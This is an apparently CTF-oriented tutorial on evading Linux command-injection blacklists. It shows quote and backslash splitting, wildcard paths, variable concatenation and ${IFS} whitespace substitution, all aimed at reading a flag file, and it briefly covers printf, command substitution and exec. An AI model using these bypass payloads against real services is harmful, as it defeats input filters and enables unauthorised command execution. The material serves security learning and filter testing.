Linux Command Execution Bypass
1 Comand execution bypass
1.1 Keyword Bypass
Bypassing keywords refers to the situation where a blacklist of keywords has been set up to prevent certain actions or commands on a host.
For instance, if cat
command is filtered:
Substitute with similar functionality commands such as
tac
,more
,less
,curl
,nl
,tail
,sort
,strings
,head
,paste
,od
.Employ quotation marks to circumvent the restriction.
c'at' flag.txt c"at" flag.txt c``at flag.txt c\at flag.txt
Another example: When the keyword flag
in file names is filtered:
Perform inline execution. Output the contents of all files in the current directory.
cat `ls`
Bypass by using wildcards.
# Printing all contents in the current directory cat * # Using the ? as a letter wildcard cat fl?g.txt # cat flag.txt /bin/c?t flag.txt # Opening flag.txt using base64 /???/????64 ????.??? # /bin/base64 flag.txt # Opening flag.txt using bzip2 /???/???/???2 ????.??? # /usr/bin/bzip2 flag.txt
Wildcards do not match environment variables, they only search for matches in the current directory. Therefore, when bypassing system commands using wildcards, you should specify their absolute paths.
# cat flag.txt /bin/c?t flag.txt # Opening flag.txt using base64 /???/????64 ????.??? # /bin/base64 flag.txt # Opening flag.txt using bzip2 /???/???/???2 ????.??? # /usr/bin/bzip2 flag.txt
Concatenation bypass
Define two variables in the shell and use them together. Use
;
to enter multiple commands on one line.# cat flag.txt a=fl;b=ag.txt;cat $a$b
1.2 Whitespace bypass
Whitespace bypass is applicable when the host has filtered whitespace.
IFS bypass
There is a variable called internal field separator IFS (internal field separator) in the bash shell of Linux, which is often used as a separator when processing text data. IFS can be one or several of White Space (blank key), Tab (table key), and Enter (enter key).
# IFS by default in zsh, tested on Arch Linux $ set | grep IFS IFS=$' \t\n\C-@' # IFS by default in bash, tested on Kali Linux $ set | grep IFS IFS=$' \t\n'
Setting IFS is similar to that of ordinary variables:
IFS=":"
. When the variable is or\t\n
, etc., use IFS to bypass spaces.cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt
%20
%09
bypass
2 Other useful tools for command execution
2.1 printf()
printf()
can convert hexadecimal or octal character numbers into their corresponding ASCII character.
printf format-string [arguments...]
\NNN
: ASCII code character represented by octal number NNN.
\xHH
: character corresponding to hexadecimal HH.
\uHHHH
: Unicode character corresponding to hexadecimal HHHH.
2.2 $()
and \
In bash, use $( )
and \
to execute commands in brackets or backquotes to complete command substitution. Command substitution is similar to variable substitution. first execute the command in the quotes, then reorganize the execution result into a new command line for execution.
$ echo today is $(date "+%Y-%m-%d")
today is 2023-06-30
2.3 exec
In the shell, exec
will replace the current shell process and execute the command directly in the current process.
for example. In WSL, if you use the exec ls
command, it will replace the WSL session process, and the entire WSL session will be replaced by the output of the exec ls
command.
$ exec ls
code project
PS C:\windows\system32> # WSL session process is replaced, returning to the Windows terminal
In the same way, using exec()
in Linux can switch shells. A similar operation can be used for escalation of privileges in penetration testing. See future articles for more on privilege escalation.
# Replace process /bin/zsh with /bin/bash
➜ ~ echo $SHELL
/bin/zsh
➜ ~ exec /bin/bash
[root@bowendelg ~]
[root@bowendelg ~]echo $SHELL
/bin/bash